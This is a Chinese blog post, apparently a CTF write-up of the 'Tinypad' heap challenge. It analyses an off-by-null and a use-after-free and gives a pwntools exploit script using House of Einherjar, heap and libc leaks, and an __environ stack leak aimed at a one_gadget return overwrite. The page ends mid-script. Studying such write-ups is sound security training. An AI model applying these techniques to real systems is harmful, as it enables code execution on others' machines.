<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.2">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"a1ph0nse.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="这是道House of Einherjar">
<meta property="og:type" content="article">
<meta property="og:title" content="Tinypad">
<meta property="og:url" content="https://a1ph0nse.github.io/2023/01/02/tinypad/index.html">
<meta property="og:site_name" content="a1ph0nse">
<meta property="og:description" content="这是道House of Einherjar">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://a1ph0nse.github.io/2023/01/02/tinypad/tinypad/hoe.jpg">
<meta property="article:published_time" content="2023-01-02T11:54:26.000Z">
<meta property="article:modified_time" content="2023-01-02T16:02:26.000Z">
<meta property="article:author" content="a1ph0nse">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="heap">
<meta property="article:tag" content="house_of_xxx">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://a1ph0nse.github.io/2023/01/02/tinypad/tinypad/hoe.jpg">

<link rel="canonical" href="https://a1ph0nse.github.io/2023/01/02/tinypad/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Tinypad | a1ph0nse</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">a1ph0nse</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">一个菜狗的挣扎</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://a1ph0nse.github.io/2023/01/02/tinypad/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="a1ph0nse">
      <meta itemprop="description" content="pwn菜狗、cs菜鸡">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="a1ph0nse">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Tinypad
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-01-02 19:54:26" itemprop="dateCreated datePublished" datetime="2023-01-02T19:54:26+08:00">2023-01-02</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-01-03 00:02:26" itemprop="dateModified" datetime="2023-01-03T00:02:26+08:00">2023-01-03</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn-wp/" itemprop="url" rel="index"><span itemprop="name">pwn_wp</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>这是道House of Einherjar</p>
<span id="more"></span>

<p>64位堆题，NO PIE，其他都开了。</p>
<p>House of Einherjar</p>
<p>在read_until函数中存在off by null，当读入size字节并且没有遇到结束符时，会<strong>多写一个\x00</strong>。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">unsigned</span> __int64 __fastcall <span class="title function_">read_until</span><span class="params">(__int64 buf, <span class="type">unsigned</span> __int64 size, <span class="type">unsigned</span> <span class="type">int</span> end_char)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">unsigned</span> __int64 i; <span class="comment">// [rsp+28h] [rbp-18h]</span></span><br><span class="line">  __int64 v6; <span class="comment">// [rsp+30h] [rbp-10h]</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0LL</span>; i &lt; size; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    v6 = read_n(<span class="number">0</span>, buf + i, <span class="number">1uLL</span>);</span><br><span class="line">    <span class="keyword">if</span> ( v6 &lt; <span class="number">0</span> )</span><br><span class="line">      <span class="keyword">return</span> <span class="number">-1LL</span>;</span><br><span class="line">    <span class="keyword">if</span> ( !v6 || *(<span class="type">char</span> *)(buf + i) == end_char )</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  *(_BYTE *)(buf + i) = <span class="number">0</span>;                      <span class="comment">// 正常结束循环会多写一个\x00，off by null</span></span><br><span class="line">  <span class="keyword">if</span> ( i == size &amp;&amp; *(_BYTE *)(size - <span class="number">1</span> + buf) != <span class="number">10</span> )</span><br><span class="line">    dummyinput(end_char);</span><br><span class="line">  <span class="keyword">return</span> i;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>tinypad结构体:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">tinypad</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">    <span class="type">int</span> size;   <span class="comment">//8byte</span></span><br><span class="line">    <span class="type">char</span> content[size]; <span class="comment">//malloc</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这个程序具有add、free、edit、show功能，其中show是程序自带的，在输入命令之前会先输出所有的content。</p>
<p>需要重点关注的是tinypad的数组，以tinypad[16*idx+0x100/0x108]的形式利用。idx==1也就是第一个tinypad的size是在tinypad[0x110]的位置，每一项总共也就0x10的空间，而前面0x110的空间是留给edit功能的。</p>
<p>由于存在off by null，因此我们可以修改prev_size和prev_inuse并触发前向合并来造成overlapping。</p>
<p>最多能同时有4个chunk，最大的size为0x100。</p>
<p>edit功能比较复杂，在检验输入之后，会将该chunk用strcpy复制到tinypad偏移为0的位置进行操作，并且<strong>edit的长度和已经写入的字符串的长度相等</strong>，写入完成后才会将tinypad处的内容strcpy到chunk。由于strcpy会被\x00截断，因此如果该chunk中有地址的话，edit的长度会比较小。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">write_n((__int64)<span class="string">&quot;(INDEX)&gt;&gt;&gt; &quot;</span>, <span class="number">11LL</span>);    <span class="comment">// Edit</span></span><br><span class="line">idx = read_int();</span><br><span class="line"><span class="keyword">if</span> ( idx &lt;= <span class="number">0</span> || idx &gt; <span class="number">4</span> )</span><br><span class="line">    <span class="keyword">goto</span> LABEL_29;</span><br><span class="line"><span class="keyword">if</span> ( !*(_QWORD *)&amp;tinypad[<span class="number">16</span> * idx + <span class="number">0xF0</span>] )</span><br><span class="line">    <span class="keyword">goto</span> LABEL_31;</span><br><span class="line">c = <span class="string">&#x27;0&#x27;</span>;</span><br><span class="line"><span class="built_in">strcpy</span>(tinypad, *(<span class="type">const</span> <span class="type">char</span> **)&amp;tinypad[<span class="number">16</span> * idx + <span class="number">0xF8</span>]);<span class="comment">// edit时会将其复制到tinypad中进行操作</span></span><br><span class="line"><span class="keyword">while</span> ( <span class="built_in">toupper</span>(c) != <span class="string">&#x27;Y&#x27;</span> )</span><br><span class="line">&#123;</span><br><span class="line">    write_n((__int64)<span class="string">&quot;CONTENT: &quot;</span>, <span class="number">9LL</span>);</span><br><span class="line">    v6 = <span class="built_in">strlen</span>(tinypad);</span><br><span class="line">    writeln((__int64)tinypad, v6);          <span class="comment">// 会先输出原有的content</span></span><br><span class="line">    write_n((__int64)<span class="string">&quot;(CONTENT)&gt;&gt;&gt; &quot;</span>, <span class="number">13LL</span>);</span><br><span class="line">    len = <span class="built_in">strlen</span>(*(<span class="type">const</span> <span class="type">char</span> **)&amp;tinypad[<span class="number">16</span> * idx + <span class="number">0xF8</span>]);<span class="comment">// 直接取字符串的len值作为长度</span></span><br><span class="line">    read_until((__int64)tinypad, len, <span class="string">&#x27;\n&#x27;</span>);<span class="comment">// off by null</span></span><br><span class="line">    writeln((__int64)<span class="string">&quot;Is it OK?&quot;</span>, <span class="number">9LL</span>);</span><br><span class="line">    write_n((__int64)<span class="string">&quot;(Y/n)&gt;&gt;&gt; &quot;</span>, <span class="number">9LL</span>);</span><br><span class="line">    read_until((__int64)&amp;c, <span class="number">1uLL</span>, <span class="number">0xA</span>u);</span><br><span class="line">&#125;</span><br><span class="line"><span class="built_in">strcpy</span>(*(<span class="type">char</span> **)&amp;tinypad[<span class="number">16</span> * idx + <span class="number">0xF8</span>], tinypad);</span><br><span class="line">writeln((__int64)<span class="string">&quot;\nEdited.&quot;</span>, <span class="number">8LL</span>);</span><br></pre></td></tr></table></figure>

<p>同时释放的函数处也有些小问题（UAF），释放之后没有清空chunk指针，有悬挂指针。虽然有标志位让其在edit的时无法通过检查，但在菜单处没有检查，会照常输出content的内容。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">free</span>(*(<span class="type">void</span> **)&amp;tinypad[<span class="number">16</span> * idx + <span class="number">0xF8</span>]);<span class="comment">// 释放但没请0，不过有标志位edit时也能检查到，不过会照常输出</span></span><br><span class="line">*(_QWORD *)&amp;tinypad[<span class="number">16</span> * idx + <span class="number">0xF0</span>] = <span class="number">0LL</span>;<span class="comment">// 0代表没使用</span></span><br><span class="line">writeln((__int64)<span class="string">&quot;\nDeleted.&quot;</span>, <span class="number">9LL</span>);</span><br></pre></td></tr></table></figure>

<p>在这里可以通过UAF泄露出当前的heapbase和libcbase。</p>
<p>一开始尝试释放两个unsorted bin chunk后，<strong>一个的fd指向的是一个堆地址（下一个chunk的地址），另一个fd指向的是unsorted bin头</strong>，通过菜单显示出来。在实际中发现这样需要让两个释放的chunk不连续，并且中间要隔着一个size&lt;0x100的chunk，否则堆地址的低位会是\x00，输出不出来。</p>
<p>其实也可以通过释放两个fast bin chunk来泄露堆地址，释放一个unsorted bin chunk来泄露libc。</p>
<p>在泄露了libcbase和heapbase之后，可以通过House of Einherjar实现overlapping。之后通过fast bin attack修改__malloc_hook为onegadget应该就可以get shell了。不过由于此处edit的特殊性，无法用于修改hook（hook处全为’\x00’，因此len为0，不能写入东西），所以尝试overlapping到tinypad的位置，控制堆指针获得任意写。</p>
<p>这里可以利用edit来在tinypad处构造fake chunk，由于<strong>edit会先在tinypad处写入数据</strong>，因此我们可以在此处写入。除此之外<strong>tinypad[0x110]开始就存放了chunk，tinypad[0x110]就是第一个chunk的size</strong>，我们可以不用构造next chunk size。</p>
<p>为了控制堆指针，我们可以在0x602060处构造fake chunk，让其覆盖到堆指针(size位要为0x101)，并让第三个chunk的size为0x100。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># House of einherjar</span></span><br><span class="line"></span><br><span class="line">tinypad=<span class="number">0x602040</span></span><br><span class="line"></span><br><span class="line">fake_chunk = tinypad+<span class="number">0x20</span> <span class="comment">#0x602060</span></span><br><span class="line">offset=heapbase-fake_chunk+<span class="number">0x50</span> <span class="comment">#计算释放的idx2和fakechunk的偏移</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x48</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">0x48</span>)<span class="comment">#idx1 用于off by null</span></span><br><span class="line">add(<span class="number">0xf0</span>,<span class="string">&#x27;b&#x27;</span>*<span class="number">0xf0</span>)<span class="comment">#idx2 用于触发house of einherjar</span></span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">&#x27;c&#x27;</span>*<span class="number">0x100</span>)<span class="comment">#idx3 让0x602160的位置是0x100，使得fake chunk的size和next chunk的presize一致</span></span><br><span class="line">add(<span class="number">0xf0</span>,<span class="string">&#x27;d&#x27;</span>*<span class="number">0xf0</span>)<span class="comment">#idx4</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#construct fake chunk</span></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x20</span>+p64(<span class="number">0</span>)+p64(<span class="number">0x101</span>)+p64(fake_chunk)+p64(fake_chunk)<span class="comment">#fd和bk指向自己，绕过检查</span></span><br><span class="line">edit(<span class="number">1</span>,payload)</span><br><span class="line"></span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x40</span>+p64(offset)<span class="comment">#off by null</span></span><br><span class="line">add(<span class="number">0x48</span>,payload)</span><br><span class="line"></span><br><span class="line">free(<span class="number">2</span>)<span class="comment"># 触发house of einherjar</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x20</span>+p64(<span class="number">0</span>)+p64(<span class="number">0x101</span>)+p64(malloc_hook+<span class="number">0x10</span>+<span class="number">88</span>)+p64(malloc_hook+<span class="number">0x10</span>+<span class="number">88</span>)</span><br><span class="line"><span class="comment">#不知道为什么如果不修改不能malloc，可能fd或者bk有错?</span></span><br><span class="line">edit(<span class="number">3</span>,payload)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>在这之后，fake chunk就被释放合并到了unsorted bin中，下一次malloc会从中获取内存。</p>
<p><img src="./tinypad/hoe.jpg" alt="hoe"></p>
<p>然后就可以尝试get shell了，但这里有有些麻烦，由于开启了FULL RELRO，因此无法改写GOT表项，并且程序没有使用stdio，对FILE_IO的利用也不行，不过在libc中有一个全局变量**__environ<strong>，储存着该程序环境变量的地址，而环境变量是储存在</strong>栈**上的，所以可以泄露栈地址，所以可以控制rip。</p>
<p>*<em>在__environ中的第一个位置上有一个栈地址，而这个栈地址距离main_ret（主程序返回操作）的距离是一个固定的偏移：8</em>30(*__environ-240)**，所以这里就可以找到main_ret的地址，之后我们修改它执行one_gadget即可getshell。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&quot;./pwn2&quot;</span>)</span><br><span class="line">libc=ELF(<span class="string">&quot;./libc-2.23.so&quot;</span>)</span><br><span class="line">p=process(<span class="string">&quot;./pwn2&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">debug</span>():</span><br><span class="line">	gdb.attach(p)</span><br><span class="line">	pause()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">size,content</span>):</span><br><span class="line">	p.recvuntil(<span class="string">&quot;(CMD)&gt;&gt;&gt; &quot;</span>)</span><br><span class="line">	p.sendline(<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">	p.recvuntil(<span class="string">&quot;(SIZE)&gt;&gt;&gt; &quot;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(size))</span><br><span class="line">	p.recvuntil(<span class="string">&quot;(CONTENT)&gt;&gt;&gt; &quot;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(content))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">free</span>(<span class="params">idx</span>):</span><br><span class="line">	p.recvuntil(<span class="string">&quot;(CMD)&gt;&gt;&gt; &quot;</span>)</span><br><span class="line">	p.sendline(<span class="string">&#x27;d&#x27;</span>)</span><br><span class="line">	p.recvuntil(<span class="string">&quot;(INDEX)&gt;&gt;&gt; &quot;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">idx,content</span>):</span><br><span class="line">	p.recvuntil(<span class="string">&quot;(CMD)&gt;&gt;&gt; &quot;</span>)</span><br><span class="line">	p.sendline(<span class="string">&#x27;e&#x27;</span>)</span><br><span class="line">	p.recvuntil(<span class="string">&quot;(INDEX)&gt;&gt;&gt; &quot;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(idx))</span><br><span class="line">	p.recvuntil(<span class="string">&quot;(CONTENT)&gt;&gt;&gt; &quot;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(content))</span><br><span class="line">	p.recvuntil(<span class="string">&quot;(Y/n)&gt;&gt;&gt; &quot;</span>)</span><br><span class="line">	p.sendline(<span class="string">&quot;y&quot;</span>)</span><br><span class="line">	<span class="comment">#return data</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params">idx</span>):</span><br><span class="line">	p.recvuntil(<span class="string">&quot; #   INDEX: &quot;</span>+<span class="built_in">str</span>(idx)+<span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">	p.recvuntil(<span class="string">&quot; # CONTENT: &quot;</span>)</span><br><span class="line">	</span><br><span class="line"></span><br><span class="line">add(<span class="number">0xf0</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">0xf0</span>)<span class="comment">#idx1</span></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&#x27;b&#x27;</span>*<span class="number">0x60</span>)<span class="comment">#idx2</span></span><br><span class="line">add(<span class="number">0xf8</span>,<span class="string">&#x27;c&#x27;</span>*<span class="number">0xf8</span>)<span class="comment">#idx3</span></span><br><span class="line">add(<span class="number">0xf0</span>,<span class="string">&#x27;d&#x27;</span>*<span class="number">0xf0</span>)<span class="comment">#idx4</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># leak libc and heap base</span></span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">heapbase=u64(p.recvuntil(<span class="string">&#x27;\n&#x27;</span>)[<span class="number">1</span>:-<span class="number">1</span>].ljust(<span class="number">7</span>,<span class="string">&#x27;\x00&#x27;</span>).rjust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))-<span class="number">0x100</span></span><br><span class="line">log.info(<span class="built_in">hex</span>(heapbase))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">show(<span class="number">3</span>)</span><br><span class="line">malloc_hook=u64(p.recvuntil(<span class="string">&#x27;\n&#x27;</span>)[:-<span class="number">1</span>].ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))-<span class="number">88</span>-<span class="number">0x10</span></span><br><span class="line">libcbase=malloc_hook-libc.sym[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line">log.info(<span class="built_in">hex</span>(libcbase))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">free(<span class="number">4</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># House of einherjar</span></span><br><span class="line"></span><br><span class="line">tinypad=<span class="number">0x602040</span></span><br><span class="line"></span><br><span class="line">fake_chunk = tinypad+<span class="number">0x20</span></span><br><span class="line">offset=heapbase-fake_chunk+<span class="number">0x50</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x48</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">0x48</span>)<span class="comment">#idx1</span></span><br><span class="line">add(<span class="number">0xf0</span>,<span class="string">&#x27;b&#x27;</span>*<span class="number">0xf0</span>)<span class="comment">#idx2</span></span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">&#x27;c&#x27;</span>*<span class="number">0x100</span>)<span class="comment">#idx3</span></span><br><span class="line">add(<span class="number">0xf0</span>,<span class="string">&#x27;d&#x27;</span>*<span class="number">0xf0</span>)<span class="comment">#idx4</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#construct fake chunk</span></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x20</span>+p64(<span class="number">0</span>)+p64(<span class="number">0x101</span>)+p64(fake_chunk)+p64(fake_chunk)</span><br><span class="line">edit(<span class="number">1</span>,payload)</span><br><span class="line"></span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x40</span>+p64(offset)</span><br><span class="line">add(<span class="number">0x48</span>,payload)</span><br><span class="line"></span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x20</span>+p64(<span class="number">0</span>)+p64(<span class="number">0x101</span>)+p64(malloc_hook+<span class="number">88</span>+<span class="number">0x10</span>)+p64(malloc_hook+<span class="number">88</span>+<span class="number">0x10</span>)</span><br><span class="line">edit(<span class="number">3</span>,payload)</span><br><span class="line"></span><br><span class="line"><span class="comment">#get shell</span></span><br><span class="line"></span><br><span class="line">one_gadget=[<span class="number">0x45226</span>,<span class="number">0x4527a</span>,<span class="number">0xf03a4</span>,<span class="number">0xf1247</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">#reset heap addr</span></span><br><span class="line">environ_addr=libcbase+libc.symbols[<span class="string">&#x27;__environ&#x27;</span>]</span><br><span class="line">log,info(<span class="built_in">hex</span>(environ_addr))</span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*(<span class="number">0x100</span>-<span class="number">0x30</span>)+p64(<span class="number">0x100</span>)+p64(environ_addr)+p64(<span class="number">0x100</span>)+p64(<span class="number">0x602148</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0xf8</span>,payload)</span><br><span class="line"></span><br><span class="line"><span class="comment">#leak __environ</span></span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">stack_addr=u64(p.recvuntil(<span class="string">&#x27;\n&#x27;</span>)[:-<span class="number">1</span>].ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line">log.info(<span class="string">&quot;stack: &quot;</span>+<span class="built_in">hex</span>(stack_addr))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span 